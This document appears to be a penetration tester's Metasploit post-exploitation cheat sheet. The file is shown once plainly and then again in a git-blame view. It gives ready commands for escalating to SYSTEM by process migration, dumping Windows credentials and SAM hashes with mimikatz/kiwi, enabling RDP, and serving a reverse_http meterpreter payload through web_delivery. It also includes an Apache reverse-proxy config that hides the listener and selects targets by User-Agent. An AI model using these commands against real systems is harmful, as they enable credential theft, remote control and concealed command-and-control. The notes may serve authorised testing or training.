killchain-compendium/post_exploitation/docs/metasploit.md

# Metasploit
* `-j` Run job in background
* `sessions -i 1` interactive session 1 

## Meterpreter

* [CheatSheet](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/)
* Upgrade shell
```sh
post/multi/manage/shell_to_meterpreter
```
* `execute` command
* `search` files
* `download` and `upload` files

# Metasploit after gaining foothold

* Meterpreter shell is opened on target. Run exploit suggester
```sh
run post/multi/recon/local_exploit_suggester
```
* Decide on your exploit and `background` the meterpreter. 
* Use the exploit.
```sh
use <path/to/exploit>
```
* Fill options like `session` and run the exploit 

### Privilege Escalation on Windows Using Metasploit
* Find process with higher privs and migrate to it. Example `spoolsv.exe`.
```sh
migrate -N spoolsv.exe
```
* After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds
```sh
load kiwi
help
creds_all
```
* Enable RDP via `run post/windows/manage/enable_rdp`

### Hashdump on Windows
* Meterpreter
```sh
run post/windows/gather/hashdump
```
```sh
load kiwi
lsa_dump_sam
```

### Webdelivery
```sh
use exploit/multi/script/web_delivery
show targets
set LPORT <attacker-Port>
set PAYLOAD windows/meterpreter/reverse_http
run -j
```
* Copy into powershell/cmd


## Reverse Proxy

* Hide behind reverse proxy, e.g. apache
* In case of an apache, these modules must be enabled
    * rewrite
    * proxy
    * proxy_http
    * headers
* Use `User-Agent` to identify targets
```ucl
<VirtualHost *:80>

	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html

	RewriteEngine On
	RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
	ProxyPass "/" "http://localhost:8080/"

	<Directory>
		AllowOverride All
	</Directory>

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>
```
second commit 2021-08-23 01:13:54 +02:00			`# Metasploit`
			* `-j` Run job in background
			* `sessions -i 1` interactive session 1

			`## Meterpreter`

			`* [CheatSheet](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/)`
			`* Upgrade shell`
			```sh
			`post/multi/manage/shell_to_meterpreter`
			```
			* `execute` command
			* `search` files
			* `download` and `upload` files

			`# Metasploit after gaining foothold`

			`* Meterpreter shell is opened on target. Run exploit suggester`
			```sh
			`run post/multi/recon/local_exploit_suggester`
			```
			* Decide on your exploit and `background` the meterpreter.
			`* Use the exploit.`
			```sh
			`use <path/to/exploit>`
			```
			* Fill options like `session` and run the exploit

bump 2021-09-08 02:09:14 +02:00			`### Privilege Escalation on Windows Using Metasploit`
second commit 2021-08-23 01:13:54 +02:00			* Find process with higher privs and migrate to it. Example `spoolsv.exe`.
			```sh
			`migrate -N spoolsv.exe`
			```
bump 2021-09-08 02:09:14 +02:00			* After `NT AUTHORITY\SYSTEM` is gained start mimikatz. and dump all creds
second commit 2021-08-23 01:13:54 +02:00			```sh
			`load kiwi`
			`help`
			`creds_all`
			```
			* Enable RDP via `run post/windows/manage/enable_rdp`
bump 2021-09-08 02:09:14 +02:00
			`### Hashdump on Windows`
			`* Meterpreter`
			```sh
			`run post/windows/gather/hashdump`
			```
			```sh
			`load kiwi`
			`lsa_dump_sam`
			```
bump 2021-09-11 02:55:17 +02:00
			`### Webdelivery`
			```sh
			`use exploit/multi/script/web_delivery`
			`show targets`
			`set LPORT <attacker-Port>`
			`set PAYLOAD windows/meterpreter/reverse_http`
			`run -j`
			```
			`* Copy into powershell/cmd`
bump 2022-03-10 01:31:54 +01:00

			`## Reverse Proxy`

			`* Hide behind reverse proxy, e.g. apache`
			`* In case of an apache, these modules must be enabled`
			`* rewrite`
			`* proxy`
			`* proxy_http`
			`* headers`
			* Use `User-Agent` to identify targets
			```ucl
			`<VirtualHost *:80>`

			`ServerAdmin webmaster@localhost`
			`DocumentRoot /var/www/html`

			`RewriteEngine On`
			`RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"`
			`ProxyPass "/" "http://localhost:8080/"`

			`<Directory>`
			`AllowOverride All`
			`</Directory>`

			`ErrorLog ${APACHE_LOG_DIR}/error.log`
			`CustomLog ${APACHE_LOG_DIR}/access.log combined`

			`</VirtualHost>`
			```